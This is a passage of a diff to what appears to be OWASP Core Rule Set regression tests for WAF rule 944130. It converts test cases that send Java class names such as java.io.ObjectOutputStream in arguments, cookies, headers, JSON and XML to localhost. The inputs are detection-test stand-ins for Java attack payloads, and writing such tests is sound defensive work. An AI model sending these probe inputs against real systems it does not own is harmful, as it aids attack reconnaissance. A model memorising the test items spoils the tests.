80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - 
Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 175 desc: "Content-Type application/json arg value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.LineNumberReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-176 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.LineNumberReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 176 desc: "Content-Type application/json arg name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - 
User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.LineNumberReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-177 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.LineNumberReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 177 desc: "Argument test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-178 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log: + expect_ids: 
[944130] + - test_id: 178 desc: "Argument name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-179 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 179 desc: "Cookie test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-180 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 180 desc: "Cookie name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.ObjectOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-181 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.ObjectOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 181 desc: "Request header test includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.ObjectOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id 
\"944130\"" - - test_title: 944130-182 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.ObjectOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 182 desc: "XML attribute value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-183 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 183 desc: "XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: 
"application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-184 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 184 desc: "Nested XML element value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-185 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 185 desc: "Content-Type text/plain includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.ObjectOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-186 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.ObjectOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 186 desc: "Content-Type application/json arg value includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.ObjectOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-187 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.ObjectOutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 187 desc: "Content-Type application/json arg 
name includes keyword java.io.ObjectOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.ObjectOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-188 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.ObjectOutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 188 desc: "Argument test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-189 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 189 desc: "Argument name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-190 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 190 desc: "Cookie test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.OutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-191 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 191 desc: "Cookie name includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.OutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-192 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.OutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 192 desc: "Request header test includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.OutputStream - method: "POST" - uri: 
"/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-193 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.OutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 193 desc: "XML attribute value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-194 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 194 desc: "XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" 
- Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-195 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 195 desc: "Nested XML element value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-196 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 196 desc: "Content-Type text/plain includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.OutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-197 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.OutputStream" + output: + log: + expect_ids: [944130] + - test_id: 197 desc: "Content-Type application/json arg value includes keyword java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.OutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-198 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.OutputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 198 desc: "Content-Type application/json arg name includes keyword 
java.io.OutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.OutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-199 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.OutputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 199 desc: "Argument test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.PipedOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-200 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: 
"/post" + version: "HTTP/1.0" + data: "test=java.io.PipedOutputStream" + output: + log: + expect_ids: [944130] + - test_id: 200 desc: "Argument name includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.PipedOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-201 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.PipedOutputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 201 desc: "Cookie test includes keyword java.io.PipedOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.PipedOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-202 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
